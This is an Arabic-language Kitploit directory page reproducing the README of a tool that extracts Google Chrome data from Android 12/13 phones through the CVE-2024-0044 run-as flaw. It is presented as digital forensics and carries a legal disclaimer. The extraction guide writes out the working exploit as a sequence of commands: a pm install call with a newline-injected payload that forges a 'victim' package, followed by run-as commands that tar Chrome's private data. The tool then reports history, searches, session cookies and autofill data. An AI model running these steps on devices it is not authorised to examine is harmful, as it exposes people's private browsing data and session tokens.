Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Chrome-Forensic_CVE-2024-0044 — أداة قوية للتحقيق الرقمي الجنائي لاستخراج وتحليل آثار متصفح جوجل كروم من أجهزة أندرويد | Kitploit
أدوات/GitHubGitHub/jacktekno/chrome-forensic_cve-2024-0044
أمان أندرويدتحليل الثغرات الأمنيةالاستغلالالتحقيق الجنائي الرقميتحليل الأجهزة المحمولة الجنائياستعادة البياناتالتحاليل الرقمية الجنائيةأمن الجوالالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubjacktekno/chrome-forensic_cve-2024-0044

Chrome-Forensic_CVE-2024-0044

أداة قوية للتحقيق الرقمي الجنائي لاستخراج وتحليل آثار متصفح جوجل كروم من أجهزة أندرويد

عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

🔍 Chrome Forensic - CVE-2024-0044

Version Python License Platform

أداة فورينزك رقمي قوية لاستخراج وتحليل آثار جوجل كروم من أجهزة أندرويد

الميزات • التثبيت • الاستخدام • التوثيق


👤 معلومات المؤلف

المؤلف: JackTekno
GitHub: github.com/JackTekno


📋 نظرة عامة

تستخدم هذه الأداة ثغرة CVE-2024-0044 (Run-as) لتجاوز قيود الصلاحيات على أجهزة أندرويد 12/13 غير المجذَّرة، مما يتيح استخراج بيانات جوجل كروم للأغراض الجنائية. تقوم الأداة بتحليل قواعد بيانات SQLite الخام وإنشاء تقارير تحليل شاملة.

🔄 سير العملية

Forensic Analysis Flowchart

سير عمل تحليل جنائي كامل بدءًا من الاستخراج وصولًا إلى إعداد التقارير


📊 الميزات والمخرجات

تقوم الأداة بإنشاء تقرير Excel شامل (result_chrome_forensic.xlsx) يحتوي على الأوراق التالية:


🛠️ المتطلبات الأساسية

متطلبات الأجهزة

  • 📱 هاتف أندرويد (أندرويد 12/13)
  • 💻 حاسوب شخصي (Linux/Windows/Mac)

بيئة الاختبار

  • 🐧 نظام التشغيل: Linux UOS 20 Professional

المتطلبات البرمجية

  • 🐍 Python 3.x
  • 📲 ADB (Android Debug Bridge)
  • 📦 ملف APK وهمي (مثل: F-Droid.apk)

🚀 التثبيت

  1. استنساخ المستودع

    root@kitploit:~
    git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
    cd Chrome-Forensic_CVE-2024-0044
    
  2. تثبيت التبعيات

    root@kitploit:~
    pip install -r requirements.txt
    

🔓 دليل استخراج البيانات

الخطوة 1: تجهيز الجهاز

  1. انتقل إلى الإعدادات → حول الهاتف
  2. انقر على رقم الإصدار 7 مرات لتفعيل خيارات المطور
  3. انتقل إلى الإعدادات → النظام → خيارات المطور
  4. فعّل تصحيح أخطاء USB
  5. قم بتوصيل الهاتف بالحاسوب عبر USB وأذِن بالاتصال

الخطوة 2: تجهيز الاستغلال

root@kitploit:~
# Push a dummy APK to temporary folder
adb push F-Droid.apk /data/local/tmp/base.apk

الخطوة 3: العثور على UID الهدف

root@kitploit:~
adb shell pm list packages -U | grep com.android.chrome
# Output example: package:com.android.chrome uid:10129
# Note the UID (e.g., 10129)

الخطوة 4: تنفيذ الاستغلال

⚠️ استبدل 10129 بمعرّف UID الفعلي لكروم من الخطوة 3

root@kitploit:~
adb shell

# Inside ADB Shell:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"

# Trigger the package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk

الخطوة 5: استخراج البيانات

root@kitploit:~
# Still inside ADB Shell
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar

# Exit ADB Shell
exit

الخطوة 6: سحب البيانات إلى الحاسوب

root@kitploit:~
adb pull /data/local/tmp/chrome.tar .

الخطوة 7: فك ضغط البيانات

استخرج ملف chrome.tar في مجلد المشروع. لا تحتاج إلى نقل الملفات يدويًا. سيعثر سكربت بايثون تلقائيًا على ملفات قاعدة البيانات داخل المجلدات المستخرجة.

root@kitploit:~
tar -xf chrome.tar

💻 الاستخدام

شغّل أداة التحليل الجنائي:

root@kitploit:~
python3 chrome_forensic.py

ستقوم الأداة بتحليل ملفات قاعدة البيانات وإنشاء result_chrome_forensic.xlsx في نفس الدليل.


⚖️ إخلاء مسؤولية قانوني

⚠️ هام: تم تصميم هذه الأداة لأغراض التحليل الجنائي التعليمي والمصرح به فقط.

  • استخدمها فقط على الأجهزة التي تملكها أو لديك إذن كتابي صريح لتحليلها
  • الوصول غير المصرح به إلى الأجهزة الرقمية قد ينتهك القوانين في منطقتك
  • لا يتحمل المؤلفون أي مسؤولية عن إساءة استخدام هذه الأداة

🤝 المساهمة

المساهمات مرحب بها! لا تتردد في تقديم طلب سحب (Pull Request).


📄 الرخصة

هذا المشروع مرخص بموجب رخصة جنو العمومية العامة الإصدار 3.0. راجع ملف LICENSE للتفاصيل.


👤 الإشادة

تم تلخيص ومشاركة إثبات المفهوم لطريقة الاستخراج بواسطة Tinyhack.com.


صُنع بكل ❤️ بواسطة JackTekno

⭐ امنح هذا المستودع نجمة • 🐛 أبلغ عن خطأ • 💡 اطلب ميزة

تنزيل الأداة
اسم الورقةالوصف
📖 سجل التصفحخط زمني مفصّل للمواقع التي تمت زيارتها
📈 التحليلات – المواقع الأعلىترتيب إحصائي لأكثر النطاقات زيارة
⚠️ تنبيهات – مشبوهعناوين URL يتم وضع علامة عليها تلقائيًا (قرصنة، مخدرات، محتوى للبالغين)
📥 التنزيلاتسجل التنزيلات مع المسارات وأحجام الملفات
🔍 مصطلحات البحثاستعلامات بحث المستخدم من شريط العناوين/جوجل
🍪 الكوكيز والجلساترموز الجلسات وبيانات الكوكيز الوصفية (مشفرة Hex)
✍️ بيانات الملء التلقائيبيانات النماذج المحفوظة (الأسماء، العناوين، إلخ.)